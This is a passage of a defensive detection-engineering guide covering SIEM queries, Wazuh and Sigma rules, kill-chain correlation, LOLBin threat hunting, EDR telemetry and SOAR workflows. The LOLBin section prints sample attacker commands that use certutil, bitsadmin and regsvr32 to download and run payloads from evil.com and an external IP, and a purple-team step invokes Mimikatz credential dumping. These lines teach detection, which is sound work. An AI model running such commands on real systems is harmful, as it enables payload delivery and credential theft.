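            yield ts, src

# Simulated burst: 25 failures in 25 seconds from one IP
burst = [(i, "203.0.113.9") for i in range(25)]
print(list(detect_bruteforce(burst)))
```

The alerted set deduplicates so one sustained attack produces one alert, matching the rate-limiting intent of Suricata's threshold keyword.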

Suricata Integration with SIEM

EVE JSON output to SIEM:

# suricata.yaml
outputs:
  - eve-log:
      enabled: yes
      filetype: regular
      filename: eve.json
      types:
        - alert:
            payload: yes
            metadata: yes
        - http:
            extended: yes
        - dns:
            query: yes
            answer: yes
        - tls:
            extended: yes
        - files:
            force-magic: yes
        - flow:
            enabled: yes

Forward to Elastic:

# Filebeat configuration
filebeat.inputs:
- type: log
  enabled: true
  paths:
    - /var/log/suricata/eve.json
  json.keys_under_root: true
  fields:
    source: suricata
    
output.elasticsearch:
  hosts: ["elasticsearch:9200"]
  index: "suricata-%{+yyyy.MM.dd}"

6. Log Analysis & Correlation Techniques

Statistical Baseline Detection

Identify anomalous authentication patterns:

Splunk SPL:
index=windows EventCode=4624
| stats count by user, src_ip
| eventstats avg(count) as avg, stdev(count) as stdev
| eval isOutlier=if(count > (avg + (2*stdev)), 1, 0)
| where isOutlier=1
| table user, src_ip, count, avg

Detection logic: Uses statistical analysis to identify abnormal authentication patterns by calculating baselines and detecting outliers that deviate significantly from normal behavior.

Query breakdown:

  1. index=windows EventCode=4624: Search successful logon events (Windows Security Event ID 4624)
  2. stats count by user, src_ip: Count logons per user from each source IP
  3. eventstats avg(count) as avg, stdev(count) as stdev:
    • Calculate average (mean) logon count across all users/IPs
    • Calculate standard deviation (how spread out the data is)
    • eventstats keeps individual rows while adding statistical fields
  4. eval isOutlier=if(count > (avg + (2*stdev)), 1, 0):
    • Mark as outlier if count exceeds mean + 2 standard deviations
    • 2 standard deviations = ~95% confidence interval
    • Anything beyond this is statistically unusual
  5. where isOutlier=1: Filter to show only outliers
  6. table user, src_ip, count, avg: Display results in readable format

What this catches:

  • User accounts with abnormally high logon activity (potentially compromised)
  • Source IPs generating excessive authentication attempts
  • Lateral movement (attacker logging into many systems)
  • Shared credential abuse

Example scenario:

  • Normal user: 5 logons/day
  • Compromised user: 150 logons/day (accessing many systems)
  • Average: 10 logons/day, StdDev: 15
  • Threshold: 10 + (2 × 15) = 40
  • Compromised account (150) triggers alert

Tuning: Adjust multiplier (2× can be 3× for fewer false positives or 1.5× for more sensitive detection)
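The same mean + 2-sigma logic is easy to reproduce outside the SIEM for ad-hoc baselining; a stdlib-only Python sketch with hypothetical logon counts:

```python
import statistics

def find_outliers(counts, sigma=2.0):
    """Return entries whose count exceeds mean + sigma * stdev of all counts."""
    values = list(counts.values())
    mean = statistics.mean(values)
    stdev = statistics.pstdev(values)
    threshold = mean + sigma * stdev
    return {k: v for k, v in counts.items() if v > threshold}

# Hypothetical daily logon counts: ten normal users plus one compromised account
logons = {f"user{i:02d}": c for i, c in enumerate([5, 7, 8, 6, 9, 10, 8, 7, 6, 9])}
logons["compromised"] = 150
print(find_outliers(logons))
```

One caveat visible here: an extreme outlier inflates the standard deviation itself, so with very small populations consider median/MAD instead of mean/stdev for a more robust baseline.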

Detect data exfiltration:

Elastic (conceptual aggregation query; KQL itself has no pipe/stats syntax, so implement this as an ES|QL query or a threshold detection rule):
event.category: network AND network.direction: outbound
| stats sum(network.bytes) as total_bytes by source.ip, destination.ip
| where total_bytes > 100000000

Detection logic: Identifies potential data exfiltration by detecting large volumes of outbound network traffic from internal hosts to external destinations.

Query breakdown:

  1. event.category: network AND network.direction: outbound:
    • Filter for network events
    • Only outbound traffic (data leaving your network)
  2. stats sum(network.bytes) as total_bytes by source.ip, destination.ip:
    • Aggregate (sum) total bytes transferred
    • Group by source IP (internal host) and destination IP (external server)
  3. where total_bytes > 100000000:
    • Filter for transfers exceeding 100MB (100,000,000 bytes)
    • Adjust threshold based on your environment

What this catches:

  • Attacker exfiltrating sensitive data (databases, documents, intellectual property)
  • Ransomware staging and uploading data before encryption (double extortion)
  • Insider threats copying data to external storage
  • Compromised cloud sync services

Example scenarios:

  • Legitimate: Software update (100MB download) - won’t trigger (inbound, not outbound)
  • Suspicious: Workstation uploads 2GB to unknown cloud storage in 10 minutes
  • Critical: Database server transfers 50GB to external IP at 3 AM

Tuning recommendations:

  • Adjust byte threshold based on normal traffic patterns (100MB is moderate)
  • Whitelist known backup destinations and cloud services
  • Set different thresholds for different hosts (workstation vs. server)
  • Add time-based filters (alerts during off-hours are more suspicious)
  • Correlate with user activity (data transfer without logged-in user = suspicious)

Enhanced version:

event.category: network AND network.direction: outbound
| stats sum(network.bytes) as total_bytes by source.ip, destination.ip
| where total_bytes > 100000000
| lookup destination.ip in threat_intel
| where NOT destination.ip in known_cloud_services
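The core aggregation (sum outbound bytes per source/destination pair, then threshold) can be sketched in Python; the flow-record fields here are illustrative:

```python
from collections import defaultdict

def large_outbound_transfers(flows, threshold_bytes=100_000_000):
    """Sum outbound bytes per (source, destination) pair and return pairs
    exceeding the threshold, like the stats/where steps in the query."""
    totals = defaultdict(int)
    for f in flows:
        if f["direction"] == "outbound":
            totals[(f["src"], f["dst"])] += f["bytes"]
    return {pair: b for pair, b in totals.items() if b > threshold_bytes}

flows = [
    {"direction": "outbound", "src": "10.0.0.5", "dst": "185.220.101.32", "bytes": 60_000_000},
    {"direction": "outbound", "src": "10.0.0.5", "dst": "185.220.101.32", "bytes": 70_000_000},
    # Inbound traffic (e.g. a large software update) is ignored.
    {"direction": "inbound",  "src": "10.0.0.5", "dst": "52.1.2.3", "bytes": 500_000_000},
]
print(large_outbound_transfers(flows))  # the 130MB outbound pair
```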

Behavioral Analytics

Unusual process execution chains:

Microsoft Sentinel KQL:
SecurityEvent
| where EventID == 4688  // Process creation
| extend ParentProcess = tostring(split(ParentProcessName, '\\')[-1])
| extend ChildProcess = tostring(split(NewProcessName, '\\')[-1])
| where ParentProcess == "winword.exe" and ChildProcess in ("powershell.exe", "cmd.exe", "wscript.exe")
| project TimeGenerated, Computer, Account, ParentProcess, ChildProcess, CommandLine

Detection logic: Detects suspicious parent-child process relationships where Microsoft Office applications spawn command interpreters or scripting engines, typically indicating macro-based malware or document exploits.

Query breakdown:

  1. SecurityEvent | where EventID == 4688:
    • Query Windows Security Event 4688 (Process Creation)
    • Every time a new process starts, this event is logged
  2. extend ParentProcess = tostring(split(ParentProcessName, '\\')[-1]):
    • Extract just the filename from full path
    • Example: C:\Program Files\Microsoft Office\WINWORD.EXE → WINWORD.EXE
    • split() splits path by backslash, [-1] takes last element
  3. extend ChildProcess = tostring(split(NewProcessName, '\\')[-1]):
    • Same extraction for child process (newly created process)
  4. where ParentProcess == "winword.exe" and ChildProcess in (...):
    • Filter for Word spawning suspicious processes:
      • powershell.exe: PowerShell (often used for payload download/execution)
      • cmd.exe: Command Prompt (can execute batch scripts, download files)
      • wscript.exe: Windows Script Host (runs .vbs, .js scripts)
  5. project TimeGenerated, Computer, Account, ParentProcess, ChildProcess, CommandLine:
    • Display relevant fields including the command-line arguments (shows what the process was doing)

Attack flow this catches:

  1. User opens malicious .docm file from phishing email
  2. User enables macros (social engineering: “Enable content to view document”)
  3. Macro executes: winword.exe spawns powershell.exe
  4. PowerShell downloads and executes second-stage payload
  5. This query triggers at step 3

Why this is suspicious:

  • Legitimate Word documents don’t need to execute PowerShell
  • Modern Office security disables macros by default
  • Attackers rely on users enabling macros to bypass security

Extend detection to other Office apps:

where ParentProcess in ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")

Investigate after alert:

  • Review CommandLine field (what command was executed?)
  • Check document source (email attachment? downloaded from where?)
  • Analyze process chain (what did PowerShell do next?)
  • Quarantine document and scan endpoint
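A minimal Python sketch of the parent-child check, including the filename extraction the KQL performs with split(); the process lists mirror the query above:

```python
# Office parents and command-interpreter children from the detection above.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SUSPICIOUS_CHILDREN = {"powershell.exe", "cmd.exe", "wscript.exe"}

def basename(path):
    """Extract the filename from a Windows path, like split(..., '\\')[-1]."""
    return path.rsplit("\\", 1)[-1].lower()

def is_suspicious_spawn(parent_path, child_path):
    return (basename(parent_path) in SUSPICIOUS_PARENTS
            and basename(child_path) in SUSPICIOUS_CHILDREN)

print(is_suspicious_spawn(
    r"C:\Program Files\Microsoft Office\WINWORD.EXE",
    r"C:\Windows\System32\powershell.exe"))  # True
```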

Off-hours administrative activity:

# Wazuh rule
<rule id="100200" level="10">
  <if_sid>5712</if_sid>  <!-- User logon -->
  <user>admin|root</user>
  <time>8pm - 6am</time>
  <weekday>saturday,sunday</weekday>
  <description>Administrator logon outside business hours</description>
  <group>authentication_success,pci_dss_10.2.5</group>
</rule>

Detection logic: Flags administrative account logins occurring during off-hours (nights and weekends), which may indicate unauthorized access, compromised credentials, or insider threats.

Rule components:

  • <rule id="100200" level="10">:
    • Custom rule ID (100000+ range for user rules)
    • Level 10 = high severity (requires investigation)
  • <if_sid>5712</if_sid>:
    • Inherit from parent rule 5712 (successful user logon)
    • Wazuh’s rule hierarchy: this adds conditions to existing logon detection
  • <user>admin|root</user>:
    • Match usernames containing “admin” OR “root”
    • Catches: administrator, admin, root, sysadmin, etc.
    • Pipe (|) = OR operator in regex
  • <time>8pm - 6am</time>:
    • Match only between 20:00 and 06:00 (overnight hours)
    • Assumes business hours are 6am-8pm
  • <weekday>saturday,sunday</weekday>:
    • Restrict matching to Saturday and Sunday
    • Note: Wazuh ANDs <time> and <weekday>, so this rule as written fires only on weekend nights; to also cover weeknights, add a companion rule with <time> but without <weekday>
  • <group>authentication_success,pci_dss_10.2.5</group>:
    • Tag with categories for reporting
    • PCI DSS 10.2.5 = compliance requirement (track privileged access)

What this catches:

  • Compromised admin credentials used by attacker at night
  • Insider threat working outside normal hours
  • Unauthorized admin access from external location
  • Persistence mechanism activating after-hours

Example scenarios:

  • Benign: IT admin performing scheduled maintenance (document and whitelist)
  • Suspicious: Admin login at 2 AM from unknown IP (investigate immediately)
  • Critical: Multiple failed logins followed by success at 3 AM Sunday (likely breach)

Tuning recommendations:

<!-- Whitelist scheduled maintenance windows -->
<rule id="100201" level="0">
  <if_sid>100200</if_sid>
  <srcip>10.0.1.50</srcip>  <!-- Known admin workstation -->
  <time>2am - 3am</time>      <!-- Scheduled maintenance window -->
  <weekday>sunday</weekday>
  <description>Whitelisted: Scheduled Sunday maintenance</description>
</rule>

<!-- Increase severity if from external IP -->
<rule id="100202" level="15">
  <if_sid>100200</if_sid>
  <srcip>!192.168.0.0/16,!10.0.0.0/8</srcip>  <!-- NOT internal IPs -->
  <description>CRITICAL: Admin logon from external IP during off-hours</description>
  <group>authentication_success,pci_dss_10.2.5,hipaa_164.312.b</group>
</rule>

Response actions:

  • Alert SOC immediately
  • Verify with admin if activity was authorized
  • Check for concurrent suspicious activities (file access, lateral movement)
  • Consider automatically disabling account pending verification
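The rule's intent (admin logons at night or on weekends) can be expressed as a quick Python check; this is a sketch of the logic, not a Wazuh API:

```python
from datetime import datetime

ADMIN_PATTERNS = ("admin", "root")  # substring match, like the regex user field

def is_off_hours_admin_logon(user, when):
    """Flag logons by admin-like accounts overnight (20:00-06:00)
    or on weekends."""
    is_admin = any(p in user.lower() for p in ADMIN_PATTERNS)
    night = when.hour >= 20 or when.hour < 6
    weekend = when.weekday() >= 5  # 5 = Saturday, 6 = Sunday
    return is_admin and (night or weekend)

print(is_off_hours_admin_logon("sysadmin", datetime(2025, 1, 14, 2, 30)))  # True
```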

Multi-Stage Attack Correlation

Kill chain detection:

Stage 1: Phishing email received
  + 
Stage 2: Malicious attachment opened
  +
Stage 3: Beacon callback to external IP
  +
Stage 4: Credential dumping (mimikatz)
  +
Stage 5: Lateral movement (psexec)
  =
HIGH CONFIDENCE BREACH

Correlation rule example (Splunk):

index=email subject="*invoice*" attachment="*.doc"
| join user [
    search index=windows EventCode=1 Image="*\\WINWORD.EXE" 
    | eval user=lower(User)
  ]
| join user [
    search index=network dest_port=443 OR dest_port=8443
    | stats count by src_ip, dest_ip, user
  ]
| join user [
    search index=windows EventCode=10 TargetImage="*\\lsass.exe"
  ]
| table _time, user, src_ip, dest_ip, subject

Detection logic: Correlates multiple events across different data sources to detect a complete phishing attack kill chain, from initial email to credential theft.

Attack kill chain detected:

  1. Stage 1: Phishing email with invoice-themed attachment (.doc file)
  2. Stage 2: User opens Word document (process execution)
  3. Stage 3: Outbound HTTPS connection (payload callback to C2)
  4. Stage 4: LSASS memory access (credential dumping with Mimikatz)

Query breakdown:

Stage 1 - Phishing Email:

index=email subject="*invoice*" attachment="*.doc"
  • Search email logs for “invoice” in subject (common phishing lure)
  • Filter for .doc attachments (macro-enabled documents)
  • Captures username of email recipient

Stage 2 - Document Opened:

join user [search index=windows EventCode=1 Image="*\\WINWORD.EXE"]
  • Join with Sysmon Event ID 1 (Process Creation)
  • Match Word process execution for same user
  • eval user=lower(User) normalizes username for matching

Stage 3 - Network Callback:

join user [search index=network dest_port=443 OR dest_port=8443]
  • Join with network logs (firewall/proxy)
  • Filter for HTTPS traffic (common C2 protocol)
  • Port 8443 = alternative HTTPS port (often used by C2)
  • Stats aggregates to show volume of traffic

Stage 4 - Credential Theft:

join user [search index=windows EventCode=10 TargetImage="*\\lsass.exe"]
  • Join with Sysmon Event ID 10 (Process Access)
  • lsass.exe = Local Security Authority (stores credentials)
  • Accessing LSASS = credential dumping attempt

Output:

_time           user       src_ip          dest_ip         subject
2025-01-15 9:15  jsmith    192.168.1.100   185.220.101.32  Invoice #4721

Why correlation matters:

  • Single event: Might be benign or false positive
  • All events together: High confidence breach (>95%)
  • Time proximity: Events occur within minutes of each other

Limitations:

  • Join performance: Can be slow on large datasets (consider using stats instead)
  • User matching: Assumes consistent username across all logs
  • Time windows: Add earliest=-1h to limit search timeframe

Improved version with time constraints:

index=email subject="*invoice*" attachment="*.doc" earliest=-1h
| eval email_time=_time
| join type=inner user [
    search index=windows EventCode=1 Image="*\\WINWORD.EXE" earliest=-1h
    | eval user=lower(User), word_time=_time
]
| where (word_time - email_time) < 1800  ``` within 30 minutes ```
| join type=left user [
    search index=network (dest_port=443 OR dest_port=8443) earliest=-1h
    | stats count, values(dest_ip) as dest_ips by user
]
| join type=left user [
    search index=windows EventCode=10 TargetImage="*\\lsass.exe" earliest=-1h
    | eval user=lower(User), lsass_access=1
]
| eval correlation_score=case(
    isnotnull(word_time) AND isnotnull(dest_ips) AND isnotnull(lsass_access), 100,
    isnotnull(word_time) AND isnotnull(dest_ips), 70,
    isnotnull(word_time), 30
)
| where correlation_score > 60
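The case() scoring above maps directly to Python; the evidence keys are illustrative names for the joined fields:

```python
def correlation_score(stages):
    """Score a candidate kill chain: the more stages observed,
    the higher the confidence, mirroring the eval case() above."""
    if stages.get("word_exec") and stages.get("c2_traffic") and stages.get("lsass_access"):
        return 100  # full chain: execution + callback + credential access
    if stages.get("word_exec") and stages.get("c2_traffic"):
        return 70   # execution plus network callback
    if stages.get("word_exec"):
        return 30   # document execution alone
    return 0

evidence = {"word_exec": True, "c2_traffic": True, "lsass_access": False}
print(correlation_score(evidence))  # 70
```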

Response when triggered:

  1. Isolate affected workstation from network
  2. Disable user account temporarily
  3. Collect forensic artifacts (memory dump, disk image)
  4. Force password reset for affected user
  5. Scan for lateral movement to other systems

7. Threat Hunting Methodology

Hypothesis-Driven Hunting

The Hunting Loop:

1. Create Hypothesis
   ↓
2. Investigate Data
   ↓
3. Uncover Patterns
   ↓
4. Identify Anomalies
   ↓
5. Create Detection Rule ──→ Production
   ↓
6. Document Findings
   ↓
Loop back to step 1

Example hunting hypothesis:

Hypothesis: Attackers are using LOLBins to bypass application whitelisting

Data sources:
- Sysmon Event ID 1 (Process Creation)
- Windows Event 4688 (Process Creation)

Investigation query:
index=windows EventCode=1
| search Image IN ("certutil.exe", "bitsadmin.exe", "regsvr32.exe", "mshta.exe")
| stats count by Image, CommandLine, ParentImage
| where NOT CommandLine IN (known_good_patterns)

Hunting methodology: This hypothesis-driven hunt looks for Living-Off-The-Land Binaries (LOLBins) - legitimate Windows tools abused by attackers to evade detection.

Target LOLBins explained:

  • certutil.exe: Certificate utility
    • Legitimate use: Manage certificates
    • Malicious use: Download files (certutil -urlcache -f http://evil.com/malware.exe)
  • bitsadmin.exe: Background Intelligent Transfer Service
    • Legitimate use: Manage file downloads
    • Malicious use: Download payloads (bitsadmin /transfer job http://evil.com/payload.exe C:\temp\payload.exe)
  • regsvr32.exe: Register DLL/OCX files
    • Legitimate use: Register COM components
    • Malicious use: Execute remote scripts (regsvr32 /s /u /i:http://evil.com/payload.sct scrobj.dll)
  • mshta.exe: Microsoft HTML Application Host
    • Legitimate use: Run .hta files
    • Malicious use: Execute remote HTA files with embedded JavaScript/VBScript

Query breakdown:

  1. index=windows EventCode=1: Sysmon process creation events
  2. search Image IN (...): Filter for suspicious LOLBin executables
  3. stats count by Image, CommandLine, ParentImage:
    • Aggregate results
    • Show which LOLBin was used, how it was called, and what spawned it
  4. where NOT CommandLine IN (known_good_patterns):
    • Exclude known legitimate usage patterns
    • Example patterns: software update scripts, system maintenance

Indicators of malicious LOLBin use:

  • Unusual parent process: Explorer.exe spawning certutil (user clicked something)
  • Network URLs in command line: Download indicators
  • Obfuscated parameters: Base64, encoded strings
  • Temp directory paths: Writing to C:\Users\*\AppData\Local\Temp\

Example findings:

Image: certutil.exe
CommandLine: certutil.exe -urlcache -f http://185.220.101.32/payload.exe C:\temp\mal.exe
ParentImage: C:\Windows\System32\cmd.exe
→ SUSPICIOUS: Downloading executable from external IP

Image: regsvr32.exe
CommandLine: regsvr32 /s /u /i:http://malicious.com/script.sct scrobj.dll  
ParentImage: C:\Program Files\Microsoft Office\WINWORD.EXE
→ CRITICAL: Office document executing remote scriptlet

Known good patterns to whitelist:

certutil.exe -addstore
certutil.exe -verifystore
bitsadmin.exe /list
regsvr32.exe /s "C:\Program Files\..."

Next steps after findings:

  1. Create Sigma detection rule for confirmed malicious patterns
  2. Add EDR policy to block suspicious LOLBin usage
  3. Implement application whitelisting with argument restrictions
  4. Document findings and update threat intel
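A simple triage helper for hunt output can encode the indicators above; the labels and URL heuristic are illustrative:

```python
import re

LOLBINS = {"certutil.exe", "bitsadmin.exe", "regsvr32.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def triage_lolbin(image, command_line):
    """Rough triage of a process event: a LOLBin whose command line
    contains a URL is a strong download/execute indicator."""
    name = image.rsplit("\\", 1)[-1].lower()
    if name not in LOLBINS:
        return "ignore"
    return "suspicious" if URL_RE.search(command_line) else "review"

print(triage_lolbin(
    r"C:\Windows\System32\certutil.exe",
    "certutil.exe -urlcache -f http://185.220.101.32/payload.exe C:\\temp\\mal.exe"))
```

Events labeled "review" are where the known-good whitelist patterns apply.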

MITRE ATT&CK Mapping

Coverage assessment:

# Map detections to ATT&CK framework
detection_coverage = {
    "T1059.001": ["sigma_rule_001", "yara_rule_003"],  # PowerShell
    "T1003.001": ["sigma_rule_015", "suricata_rule_007"],  # LSASS Memory
    "T1021.002": ["sigma_rule_022"],  # SMB/Windows Admin Shares
    "T1071.001": ["suricata_rule_015", "sigma_rule_030"],  # Web Protocols
}

# Calculate coverage percentage
covered_techniques = len(detection_coverage.keys())
total_techniques = 193  # ATT&CK Enterprise techniques (count varies by framework version)
coverage_percentage = (covered_techniques / total_techniques) * 100

Tip: visualize detection coverage as an ATT&CK Navigator heatmap across tactics and techniques.

Hunting Queries Library

Uncommon parent-child process relationships:

index=sysmon EventCode=1
| stats count by ParentImage, Image
| where count < 5
| table ParentImage, Image, count

Hunting logic: Identifies rare parent-child process combinations that may indicate malicious activity. Legitimate processes follow predictable patterns; attackers create unusual relationships.

What this finds:

  • Processes rarely spawned by specific parents (count < 5 in your dataset)
  • Example findings:
    • calc.exe → powershell.exe (calculator spawning PowerShell? Suspicious!)
    • notepad.exe → cmd.exe (possible process injection or exploit)
    • Unknown process chains indicating malware behavior

Tuning: Adjust count threshold based on environment size. Larger environments need higher thresholds.
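The stats/where rarity logic can be sketched with a Counter over process-creation events (field names assumed):

```python
from collections import Counter

def rare_pairs(events, max_count=5):
    """Count (parent, child) process pairs and return the rare ones,
    matching the stats/where steps of the hunting query above."""
    pairs = Counter((e["parent"], e["child"]) for e in events)
    return {pair: n for pair, n in pairs.items() if n < max_count}

# Fifty routine service launches plus one anomalous chain.
events = ([{"parent": "services.exe", "child": "svchost.exe"}] * 50
          + [{"parent": "calc.exe", "child": "powershell.exe"}])
print(rare_pairs(events))  # only the calc.exe -> powershell.exe pair
```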


Scheduled tasks created for persistence:

index=windows EventCode=4698
| rex field=TaskContent "<Command>(?<command>.*?)</Command>"
| where command LIKE "%powershell%" OR command LIKE "%cmd%"
| table _time, Computer, TaskName, command

Hunting logic: Detects scheduled tasks containing command interpreters, a common persistence mechanism used by attackers.

Event details:

  • EventID 4698: Windows Security - Scheduled task created
  • Logs when new tasks are registered in Task Scheduler

What this catches:

  • Malware creating scheduled tasks to survive reboots
  • Command-line execution via task scheduler (fileless persistence)
  • Example malicious tasks:
    TaskName: WindowsUpdate
    Command: powershell.exe -enc <base64_payload>
    → Masquerading as Windows Update but executing malicious PowerShell
    

Regex breakdown:

  • rex extracts XML content from TaskContent field
  • <Command>(?<command>.*?)</Command> captures command between XML tags
  • Named capture group command for easy filtering
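The same capture works in Python; note that Python spells the named group (?P<command>...) where SPL's rex accepts (?<command>...). The task XML below is an illustrative sample:

```python
import re

TASK_XML = """<Task><Actions><Exec>
  <Command>powershell.exe</Command>
  <Arguments>-enc JABj...</Arguments>
</Exec></Actions></Task>"""

# Non-greedy capture between the XML tags, as in the rex command above.
match = re.search(r"<Command>(?P<command>.*?)</Command>", TASK_XML)
print(match.group("command"))  # powershell.exe
```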

Investigate:

  • Verify task legitimacy with system admins
  • Check task trigger (hourly? daily? at system startup?)
  • Review user context (SYSTEM? Administrator?)

Fileless malware indicators:

index=sysmon EventCode=7
| where ImageLoaded LIKE "%\\Windows\\assembly\\%"
| stats count by Image, ImageLoaded
| where count > 100

Hunting logic: Detects excessive .NET assembly loading, indicating potential fileless malware using .NET reflection to execute code in memory.

Technical background:

  • EventID 7: Sysmon - Image loaded (DLL/assembly loaded into process)
  • %\\Windows\\assembly\\% = Global Assembly Cache (GAC) for .NET
  • Fileless malware loads assemblies dynamically to avoid disk artifacts

What this catches:

  • Malware using PowerShell to load .NET assemblies in memory
  • Living-off-the-land attacks leveraging .NET framework
  • Process injection via .NET assembly loading

Why count > 100?

  • Normal process: Loads handful of assemblies (5-20)
  • Malware: Loads many assemblies repeatedly (100+) for obfuscation/persistence

Example finding:

Image: powershell.exe
ImageLoaded: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\...
Count: 347
→ PowerShell loading automation framework excessively (likely malicious script)

Next steps:

  • Capture PowerShell script block logging (Event ID 4104)
  • Analyze command history
  • Check for encoded commands or obfuscation

8. EDR/XDR Integration & Telemetry

Modern Endpoint Detection

EDR vs Traditional Antivirus:

Traditional AV:
- Signature-based
- File-level scanning
- Reactive

Modern EDR:
- Behavioral analysis
- Process/memory inspection
- Proactive threat hunting
- Incident response capabilities

Key EDR Telemetry

Process execution telemetry:

{
  "event_type": "process_creation",
  "timestamp": "2025-01-15T14:23:10Z",
  "host": "WORKSTATION-042",
  "process": {
    "name": "powershell.exe",
    "pid": 5432,
    "command_line": "powershell.exe -enc JABj...",
    "parent": "outlook.exe",
    "parent_pid": 2891,
    "user": "DOMAIN\\jsmith",
    "integrity_level": "medium"
  },
  "network": {
    "connections": [
      {
        "remote_ip": "185.220.101.32",
        "remote_port": 443,
        "direction": "outbound"
      }
    ]
  },
  "file_operations": [
    {
      "path": "C:\\Users\\jsmith\\AppData\\Local\\Temp\\malware.exe",
      "operation": "create"
    }
  ]
}

Detection rule leveraging EDR data:

Event: Process with encoded PowerShell command
  AND Parent = outlook.exe/winword.exe
  AND Network connection to external IP
  AND File creation in Temp directory
  =
Alert: Possible phishing-based payload execution
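Expressed against the telemetry sample above, the pseudo-rule becomes a small predicate (a sketch using that sample's field names):

```python
import ipaddress

def phishing_payload_alert(event):
    """AND the four conditions of the pseudo-rule over one EDR event."""
    proc = event["process"]
    encoded_ps = (proc["name"] == "powershell.exe"
                  and "-enc" in proc["command_line"].lower())
    office_parent = proc["parent"] in ("outlook.exe", "winword.exe")
    external_conn = any(
        c["direction"] == "outbound"
        and not ipaddress.ip_address(c["remote_ip"]).is_private
        for c in event.get("network", {}).get("connections", []))
    temp_write = any("\\Temp\\" in f["path"] and f["operation"] == "create"
                     for f in event.get("file_operations", []))
    return encoded_ps and office_parent and external_conn and temp_write

event = {
    "process": {"name": "powershell.exe",
                "command_line": "powershell.exe -enc JABj...",
                "parent": "outlook.exe"},
    "network": {"connections": [{"remote_ip": "185.220.101.32",
                                 "remote_port": 443, "direction": "outbound"}]},
    "file_operations": [{"path": "C:\\Users\\jsmith\\AppData\\Local\\Temp\\malware.exe",
                         "operation": "create"}],
}
print(phishing_payload_alert(event))  # True
```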

XDR Correlation

XDR (Extended Detection and Response) correlates telemetry across endpoints, network, email, and cloud.

Cross-layer detection example:

Timeline:
09:15 - Email gateway: Malicious attachment detected (blocked)
09:17 - Email gateway: Similar email different hash (delivered)
09:23 - EDR: User opened suspicious Word document
09:24 - EDR: Word spawned PowerShell (encoded command)
09:25 - Network: PowerShell connected to known C2 IP
09:26 - EDR: PowerShell injected into explorer.exe
09:28 - Cloud: Unusual O365 login from new IP
09:30 - EDR: Mass file access (potential ransomware)

XDR Correlation Score: 95/100 - HIGH CONFIDENCE BREACH

9. Automation & SOAR Integration

Security Orchestration Use Cases

Automated response workflow:

1. Alert triggered: "Malware detected on endpoint"
   ↓
2. SOAR enrichment:
   - Query threat intelligence (VirusTotal, AbuseIPDB)
   - Check user risk score
   - Validate with EDR
   ↓
3. Automated actions:
   IF confidence > 90%:
     - Isolate endpoint
     - Block C2 IP at firewall
     - Revoke user session tokens
     - Create ticket
     - Notify SOC
   ELSE:
     - Create ticket for investigation
     - Notify tier-1 analyst
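The confidence gate in the workflow above can be sketched as a function returning a response plan; the action names are illustrative, and a real SOAR playbook would execute them through its own connectors:

```python
def respond(alert, confidence):
    """Return the response plan for an enriched alert based on
    the confidence threshold from the workflow above."""
    if confidence > 90:
        # High confidence: contain first, then notify.
        return ["isolate_endpoint", "block_c2_ip", "revoke_sessions",
                "create_ticket", "notify_soc"]
    # Lower confidence: route to a human before any disruptive action.
    return ["create_ticket", "notify_tier1"]

print(respond({"type": "malware_detected"}, confidence=95))
```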

Detection-as-Code Pipeline

CI/CD for detection rules:

# .gitlab-ci.yml
stages:
  - validate
  - test
  - convert
  - deploy

validate_sigma:
  stage: validate
  script:
    - sigma check rules/

test_rules:
  stage: test
  script:
    - python tests/test_detection_rules.py

convert_sigma:
  stage: convert
  script:
    - sigma convert -t splunk rules/ > converted/splunk/rules.conf
    - sigma convert -t lucene rules/ > converted/elastic/rules.txt
    - sigma convert -t kusto rules/ > converted/sentinel/rules.kql

deploy_to_siem:
  stage: deploy
  script:
    - curl -X POST "$SPLUNK_API/alerts" -d @converted/splunk/rules.conf
    - python deploy_elastic.py converted/elastic/
  only:
    - main

Version control for detections:

detection-rules/
├── sigma/
│   ├── windows/
│   │   ├── process_creation/
│   │   │   ├── mimikatz_usage.yml
│   │   │   └── suspicious_powershell.yml
│   │   └── network/
│   │       └── beacon_callback.yml
│   └── linux/
│       └── privilege_escalation/
├── yara/
│   ├── malware/
│   │   ├── cobalt_strike.yar
│   │   └── emotet.yar
│   └── webshells/
├── suricata/
│   └── emerging-threats.rules
└── tests/
    ├── test_sigma_rules.py
    └── test_data/
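A test suite like tests/test_sigma_rules.py might start with a minimal structural check on parsed rules. This is a sketch; a real suite would lean on sigma-cli or pySigma for full validation:

```python
def validate_sigma_rule(rule):
    """Minimal structural check a CI validate stage might run on a
    parsed Sigma rule (a dict, e.g. from yaml.safe_load)."""
    missing = {"title", "logsource", "detection"} - rule.keys()
    if missing:
        return False, f"missing keys: {sorted(missing)}"
    if "condition" not in rule["detection"]:
        return False, "detection block needs a condition"
    return True, "ok"

rule = {
    "title": "Suspicious PowerShell Execution",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {"Image|endswith": "\\powershell.exe"},
        "condition": "selection",
    },
}
print(validate_sigma_rule(rule))  # (True, 'ok')
```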

10. Detection Engineering Metrics & Continuous Improvement

Key Performance Indicators

Detection health dashboard:

Metric                          Target    Current   Status
────────────────────────────────────────────────────────────
Rule Coverage (ATT&CK)          > 70%     68%       ⚠️
True Positive Rate              > 85%     91%       ✅
False Positive Rate             < 5%      8%        ⚠️
Mean Time to Detect (MTTD)      < 15min   12min     ✅
Mean Time to Respond (MTTR)     < 1hr     45min     ✅
Rules Tested/Validated          100%      100%      ✅
Alert Fatigue Score             < 20      25        ⚠️
Detection Logic Errors          0         2         ❌

Alert Tuning Process

Iterative refinement:

1. Collect False Positive data
   ↓
2. Analyze common patterns
   ↓
3. Update detection logic
   ↓
4. Add exclusions/whitelisting
   ↓
5. Test against historical data
   ↓
6. Deploy updated rule
   ↓
7. Monitor for 2 weeks
   ↓
8. Repeat

Exclusion management:

# sigma rule with managed exclusions
title: Suspicious PowerShell Execution
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-enc'
      - '-encodedcommand'
  filter_legitimate:
    CommandLine|contains:
      - 'C:\Program Files\Monitoring\scripts\'  # Known good scripts
      - 'HealthCheck.ps1'
    User|endswith: 'SYSTEM'
  condition: selection and not filter_legitimate

Purple Team Exercises

Collaborative detection validation:

Red Team Action:
  Execute: Invoke-Mimikatz -DumpCreds

Expected Blue Team Detection:
  1. Sysmon Event 10: LSASS memory read
  2. Sigma rule triggers: "mimikatz_usage.yml"
